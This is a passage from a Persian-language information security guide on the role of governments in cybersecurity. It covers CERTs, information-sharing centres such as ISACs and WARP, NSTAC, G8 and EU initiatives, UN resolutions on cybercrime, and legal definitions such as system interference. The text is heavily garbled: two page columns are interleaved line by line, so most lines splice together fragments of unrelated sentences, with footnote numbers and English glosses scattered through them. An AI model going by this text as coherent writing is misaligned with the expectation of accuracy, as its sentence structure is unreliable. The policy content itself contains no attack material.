‫ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺁﮔـﺎﻫﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎ ﻭ‬ ‫ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺩﻭﻟـﺖ ﺩﺭ ﻭﺯﺍﺭﺕ ﺑﺎﺯﺭﮔـﺎﻧﻲ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺭﻭﺷﻬﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺳﺖ‪ .‬ﻣﻄﺎﻟﻌﺎﺕ ﻣﻮﺭﺩﻱ ﻭ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ‬ ‫ﻣﺄﻣﻮﺭﻳﺖ ‪ NIST‬ﺗﻬﻴﻪ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﻌﻴﺎﺭﻫﺎ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻓﻨﺎﻭﺭﻱ‬
‫ﺁﻧﭽﻪ ﻛﻪ ﭘﻴﺸﺘﺮ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻧﺪ‪ ،‬ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺍﻳـﻦ‬
‫ﻫﺪﻑ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﺯ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﺧﻮﺍﺳـﺘﻪ ﻛـﻪ‬ ‫‪70‬‬ ‫‪Data Protection Directive‬‬
‫‪71‬‬ ‫‪National‬‬ ‫‪Institute‬‬ ‫‪of‬‬ ‫‪Standards‬‬ ‫‪and‬‬
‫‪Technology‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٤٦‬‬

‫ﭘﻴﺸﻘﺪﻡ ﺷﺪ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ‪ CERT‬ﺭﺍ ﺗﻬﻴﻪ ﻛﺮﺩ‪ .‬ﮔـﺮﻭﻩ ‪G8‬‬ ‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ ﻛﻪ ﻫﻤﺔ‬
‫ﻧﻴﺰ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﻧﻘﺎﻁ ﺗﻤﺎﺱ ﺩﺍﺋﻤﻲ ﺍﻳﺠﺎﺩ ﻛـﺮﺩ ﺗـﺎ ﻫﻤﻜـﺎﺭﻱ ﻭ‬ ‫ﻃﻴﻔﻬــﺎﻱ ﻣﺨــﺎﻃﺒﻴﻦ ﺭﺍ ﺩﺭ ﺑــﺮ ﺑﮕﻴــﺮﺩ‪ .‬ﺍﺭﺍﺋــﻪ ﮔﺰﺍﺭﺷــﻬﺎ ﻭ‬
‫ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗـﺴﻬﻴﻞ ﺷـﻮﺩ؛ ﻭ‬ ‫ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﺑﻪ ﻣﺠﺎﻣﻊ ﻣﺘﺨﺼﺼﻴﻦ ﺩﺭ ﺍﻓﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﻭﻟﺘﻬﺎﻱ ﻏﻴﺮ ﻋﻀﻮ ﺩﺭ ﮔﺮﻭﻩ ‪ G8‬ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬ ‫ﻣﺆﺛﺮ ﺍﺳﺖ‪ .‬ﺁﻣﻮﺯﺵ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﺑﻮﺭﺳـﻬﺎﻱ ﺗﺤـﺼﻴﻠﻲ ﻭ‬
‫ﺩﺭ ﺁﻥ ﻣﺸﺎﺭﻛﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻮﺳﻌﻪﺍﻱ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺩﺍﻧﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻧﻴـﺰ‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﻭﻟﺘﻬﺎﻱ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﺷﻜﺎﻝ‬ ‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺗﻮﺻﻴﻪ ﻛﺮﺩﻩ ﻛـﻪ‬
‫ﻣﺨﺘﻠــﻒ ﺩﺭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣﺆﺳــﺴﺎﺗﻲ ﺍﻳﺠــﺎﺩ ﻧﻤﺎﻳــﺪ ﻛــﻪ‬ ‫ﺗﻤﺮﻛﺰ ﺑﻴﺸﺘﺮ ﺩﻭﺭﻩﻫﺎ ﺭﺍ ﺑﺮ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺩﺍﻭﻃﻠﺒﺎﻧﺔ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻛﻨﻨـﺪ؛‬ ‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ‪ -‬ﻳﻜﻲ ﺩﻳﮕﺮ ﺍﺯ ﻧﻘـﺸﻬﺎﻱ ﻣﻬـﻢ ﺩﻭﻟـﺖ‪،‬‬
‫ﻫﻤﭽﻮﻥ ﻣﺮﺍﻛﺰ ﺍﺷﺘﺮﺍﻙ ﻭ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ )‪ .٧٥(ISAC‬ﺑﻌﻨـﻮﺍﻥ‬ ‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭﺑﺎﺭﺓ ﺁﺳـﻴﺐ ﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ‪،‬‬
‫ﻣﺜﺎﻝ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﺍﻱ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺻـﻨﻌﺖ )ﻫﻤﭽـﻮﻥ‬ ‫ﺍﺧﻄﺎﺭ ﺩﺭ ﻣﻮﺭﺩ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺟﺪﻳـﺪ‪ ،‬ﺍﺭﺍﺋـﻪ ﭘﻴـﺸﻨﻬﺎﺩﺍﺕ‬
‫ﺧﺪﻣﺎﺕ ﺑﺨـﺶ ﻣـﺎﻟﻲ‪ ،‬ﺑﺨـﺶ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﻠﻔﻨـﻲ ﻭ ﺻـﻨﻌﺖ ﻧﻴـﺮﻭﻱ ﺑـﺮﻕ(‬ ‫ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻼﺕ‪ ،‬ﻭﺻﻠﻪ ﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ٧٢‬ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‬
‫‪ ISAC‬ﺗﺄﺳﻴﺲ ﻧﻤﻮﺩﻩ ﻭ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻣﺜﻞ ﻛﺎﻧﺎﺩﺍ‪ ،‬ﺁﻟﻤﺎﻥ‪ ،‬ﮊﺍﭘﻦ ﻭ‬ ‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺩﺟﺔ ﻣﺮﺍﻛﺰ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﻧﻈﻴـﺮ‬
‫ﻫﻠﻨﺪ ﻧﻴﺰ ﺩﺍﺭﺍﻱ ‪ ISAC‬ﻣﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﻧﮕﻠـﺴﺘﺎﻥ ﺑـﺪﻧﺒﺎﻝ ﻣﻔﻬـﻮﻡ‬ ‫ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ )‪ ٧٣(CERT‬ﻭ ﻣﺮﺍﻛﺰ ﻫﻤﻜـﺎﺭﻱ‬
‫‪) ٧٦WARP‬ﻫﺸﺪﺍﺭ‪ ،‬ﺗﻮﺻﻴﻪ ﻭ ﮔﺰﺍﺭﺵ ﻧﻜﺎﺕ( ﻣﻲﺑﺎﺷﺪ ‪ -‬ﻳﻚ ﺷﺒﻜﻪ‬ ‫ﻛﻪ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﺮﭘﺎ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺗﺄﻣﻴﻦ ﺳﺎﺯﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‬
‫ﺳﺮﺍﺳﺮﻱ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺑﻬﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺗﻮﺻـﻴﻪﻫـﺎ ﻭ ﻫـﺸﺪﺍﺭﻫﺎﻱ‬ ‫‪ CERT‬ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ ‪Carnegie Mellon‬‬
‫ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺩﺭﻳﺎﻓﺖ ﻛﺎﻣﻠﺘﺮ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺣـﻮﺍﺩﺙ‬ ‫ﻳﻚ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻖ ﻭ ﺗﻮﺳﻌﺔ ﺩﻭﻟﺘﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﻛﻤـﻚ‬
‫ﺩﺭ ﺁﻥ ﻛﺸﻮﺭ‪.‬‬ ‫ﺑﻪ ﺍﺩﺍﺭﺓ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ‪ ،‬ﺍﻧﺘﺸﺎﺭ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪،‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺩﻭﻟﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‬ ‫ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﺓ ﺗﻐﻴﻴـﺮﺍﺕ ﺑﻠﻨـﺪﻣـﺪﺕ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﺒﻜﻪﺍﻱ‪ ،‬ﻭ‬
‫ﻛﻤﻴﺘﻪ ﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤـﻮﻣﻲ ﺍﻳﺠـﺎﺩ ﻛﻨـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻧﻤﻮﻧـﻪ‬ ‫ﻫﻤﭽﻨﻴﻦ ﺁﻣـﻮﺯﺵ ﻧﺤـﻮﺓ ﺗﻬﻴـﺔ ﻃﺮﺣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺗﻲ‬
‫‪٧٧‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻤﻴﺘﺔ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻣﺨـﺎﺑﺮﺍﺕ )‪(NSTAC‬‬ ‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮﻱ ﻛـﻪ ‪ CERT‬ﺩﺭ‬
‫ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﻣﺘـﺸﻜﻞ ﺍﺳـﺖ ﺍﺯ ﺳـﻲ ﻧﻤﺎﻳﻨـﺪﺓ ﻣﻬـﻢ ﺻـﻨﻌﺖ‬ ‫ﺁﻧﻬــﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻋﺒﺎﺭﺗﻨــﺪ ﺍﺯ ﻣــﺎﻟﺰﻱ‪ ،‬ﮊﺍﭘــﻦ‪ ،‬ﺍﺳــﺘﺮﺍﻟﻴﺎ ﻭ ﻛــﺮﻩ‪.‬‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ‪ ،‬ﺷـﺮﻛﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ‬ ‫‪ Mcert‬ﻳﻚ ﻣﺮﻛﺰ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ‬
‫ﺍﻃﻼﻋــﺎﺕ‪ ،‬ﻭ ﻣﻘﺎﻣــﺎﺕ ﻣــﺴﺌﻮﻝ ﺍﻣﻨﻴــﺖ ﻣﻠــﻲ ﻭ ﺳﻴــﺴﺘﻤﻬﺎﻱ‬ ‫ﺷﺮﻛﺘﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﺩﺭ ﺁﻟﻤﺎﻥ ﺍﺳﺖ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ‬
‫ﺍﺭﺗﺒـﺎﻃﻲ ﺍﺿـﻄﺮﺍﺭﻱ‪ NSTAC .‬ﻧﻴـﺰ ﻣـﺸﺎﻭﺭ ﺻـﻨﻌﺘﻲ ﺭﺋــﻴﺲ‬ ‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﻋﻤﻮﻣﻲ ﺭﺍ ﺗﻮﺳﻂ ﺍﻧﺠﻤﻦ ‪BITKOM ICT‬‬

‫ﺟﻤﻬﻮﺭ ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﻜﻼﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻭ ﺁﻣـﺎﺩﮔﻲ‬ ‫ﺁﻟﻤﺎﻥ‪ ،‬ﻫﻔﺖ ﭘﺸﺘﻴﺒﺎﻥ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺻﻨﻌﺘﻲ ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﺍﻳـﻦ‬
‫ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺍﺳﺖ‪.‬‬ ‫ﻛﺸﻮﺭ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫ﺑﺘﺪﺭﻳﺞ ﺑـﺮﺍﻱ ﺗﺒـﺎﺩﻝ ﺑﻬﺘـﺮ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﺢ ﻣﻨﻄﻘـﻪﺍﻱ ﻭ‬
‫ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ‬ ‫ﻓﺮﺍﻣﻨﻄﻘﻪﺍﻱ‪ ،‬ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﭼﻨﺪﻣﻠﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ‪ .‬ﻛﻤﻴﺴﻴﻮﻥ‬
‫ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺨـﺶ‬ ‫ﺍﺭﻭﭘﺎ ﺩﺭ ﮊﻭﺋﻦ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻳـﻚ ﻣﻌﺎﻫـﺪﻩ ﺩﺭ ﺧـﺼﻮﺹ ﺗﻘﻮﻳـﺖ‬
‫ﺧــﺼﻮﺻﻲ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ "ﻗــﺎﻧﻮﻥ ﺟــﺮﺍﺋﻢ" ﺍﺳــﺖ‪ .‬ﻣﺆﺳــﺴﺎﺕ‬ ‫‪ CERT‬ﺩﺭ ﺍﺭﻭﭘﺎ ﻭ ﻣﺸﺎﺭﻛﺖ ﺑﻬﺘﺮ ﺍﻋـﻀﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺁﻥ ﻣﺮﻛـﺰ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﻣﻨﻄﻘﻪﺍﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﻫﺮ ﻛـﺸﻮﺭ ﺑﻌﻨـﻮﺍﻥ‬ ‫ﻣﻨﺘﺸﺮ ﻛﺮﺩ‪ .‬ﺩﺭ ﻓﻮﺭﻳﻪ ‪ ۲۰۰۳‬ﺍﻳﻦ ﻛﻤﻴﺴﻴﻮﻥ ﮔﺎﻡ ﻓﺮﺍﺗﺮﻱ ﻧﻬﺎﺩ ﻭ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﻬﺒﻮﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‬ ‫ﺗــﺼﻤﻴﻢ ﺧــﻮﺩ ﻧــﺴﺒﺖ ﺑــﻪ ﺍﻳﺠــﺎﺩ ﺳــﺎﺯﻣﺎﻥ ﺍﻣﻨﻴــﺖ ﺷــﺒﻜﻪ ﻭ‬
‫ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺨﻠﻔﺎﺗﻲ ﻛﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ‪ ،‬ﻳـﺎ ﺩﺭ‬ ‫ﺍﻃﻼﻋــﺎﺕ‪ ٧٤‬ﺭﺍ ﺍﻋــﻼﻡ ﻧﻤــﻮﺩ‪ APEC .‬ﺑﻤﻨﻈــﻮﺭ ﺭﺍﻩﺍﻧــﺪﺍﺯﻱ‬
‫ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﻣﺨﺪﻭﺵ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻗـﻮﺍﻧﻴﻦ ﺧـﻮﺩ ﺭﺍ‬ ‫‪ CERT‬ﻣﺤﻠــﻲ‪ ،‬ﺑــﺮﺍﻱ ﺁﻣــﻮﺯﺵ ﺩﺍﺧﻠــﻲ ﻛــﺸﻮﺭﻫﺎ ﻭ ﺗﻮﺳــﻌﻪ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳـﻦ ﻣﺮﻛـﺰ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﺔ ﻣﻨﻄﻘـﻪ‬
‫‪75‬‬ ‫‪Information Sharing and Analysis Center‬‬
‫‪76‬‬ ‫‪Warning, Advice & Reporting Point‬‬ ‫‪72‬‬ ‫‪Security Patches‬‬
‫‪77‬‬ ‫‪National Security Telecommunication‬‬ ‫‪73‬‬ ‫‪Computer Emergency Response Team‬‬
‫‪Advisory Committee‬‬ ‫‪74‬‬ ‫‪Network And Information Security Agency‬‬
‫‪٢٤٧‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻳﺎ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬ ‫ﺳﺎﺯﮔﺎﺭ ﻧﻤﺎﻳﺪ‪ .‬ﭼﺎﺭﭼﻮﺏ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻣﺘﺸﻜﻞ ﺍﺯ ﻗﻮﺍﻧﻴﻦ‬
‫ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﻭ ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷـﻮﻧﺪ‪ ،‬ﻳـﺎ ﺑـﻪ ﻳـﻚ‬ ‫ﻣﻮﺿﻮﻋﻪ‪ ٧٨‬ﻭ ﻗﻮﺍﻧﻴﻦ ﺭﻭﺍﻝﻣﻨـﺪ‪ ٧٩‬ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﻣﻔـﺎﻫﻴﻢ ﺣـﺮﻳﻢ‬
‫ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻔــﻮﺫ ﻛــﺮﺩﻩ ﻭ ﺷــﻜﻞ ﻇــﺎﻫﺮﻱ ﺁﻥ ﺭﺍ ﺗﻐﻴﻴــﺮ‬ ‫ﺧﺼﻮﺻﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻛﺎﺭﺑﺮﺩ ﺍﺧﺘـﺼﺎﺻﻲ ﺩﺍﺭﺩ ﻭ‬
‫ﻣﻲ ﺩﻫﻨﺪ‪ ،‬ﻫﻤﻪ ﺟـﺰﺀ ﺍﻳـﻦ ﺩﺳـﺘﻪ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﻧﺪ‪.‬‬ ‫ﻧﻴﺰ ﺍﺯ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻴﺪﺍﻧﻲ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻋﻨﺼﺮ "ﻗـﺼﺪ" ﺑـﺮﺍﻱ ﺗﻤـﺎﻳﺰ ﻣﻴـﺎﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﺷﺎﻳﺪ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺑﺎﺷـﺪ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺻﺮﻓﹰﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻣﻌﻤﻮﻝ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﺗﺼﺎﺩﻓﻲ‬
‫ﻛﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﻣﺠﻤـﻊ‬
‫ﻭﻳﺮﻭﺳﻬﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬ ‫ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ ﻣﻠــﻞ ﺩﺭ ﺩﺳــﺎﻣﺒﺮ ‪ ۲۰۰۰‬ﻭ ﮊﺍﻧﻮﻳــﻪ ‪۲۰۰۲‬‬
‫ﺗﺪﺍﺧﻞ ﺳﻴﺴﺘﻢ‪ :٨٢‬ﺟﻠﻮﮔﻴﺮﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺳﻴـﺴﺘﻢ‬ ‫•‬ ‫ﻗﻄﻌﻨﺎﻣــﻪﻫــﺎﻱ ‪ ۵۵/۶۳‬ﻭ ‪ ۵۶/۱۲۱‬ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﻣﺒــﺎﺭﺯﻩ ﺑــﺎ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺼﻮﺭﺕ ﺗﻌﻤــﺪﻱ ﺍﺯ ﻃﺮﻳــﻖ ﻭﺭﻭﺩ‪ ،‬ﺍﻧﺘﻘــﺎﻝ‪،‬‬ ‫ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﺑـﻪ ﺗـﺼﻮﻳﺐ‬
‫ﺗﺨﺮﻳﺐ‪ ،‬ﺣﺬﻑ‪ ،‬ﻳﺎ ﺗﻐﻴﻴـﺮ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ .‬ﺍﻳـﻦ ﺑﻨـﺪ‬ ‫ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﺑﻴﺎﻥ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ‬
‫ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺍﺯ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻳﺎ ﻭﺭﻭﺩ‬ ‫ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻥ ﭘﻨﺎﻫﮕـﺎﻩ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ ﻣﺮﺗﻜـﺐ ﺟـﺮﺍﺋﻢ‬
‫ﻭﻳﺮﻭﺱ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻛـﺎﺭﻛﺮﺩ ﻃﺒﻴﻌـﻲ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺁﻥ ﺗﺪﺍﺧﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺷﻮﺩ‪" .‬ﺁﺳﻴﺐ ﺟﺪﻱ" ﻋﻨـﺼﺮﻱ‬ ‫ﺍﻳﻦ ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﻋﻨﻮﺍﻥ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﺟﻬـﺖ‬
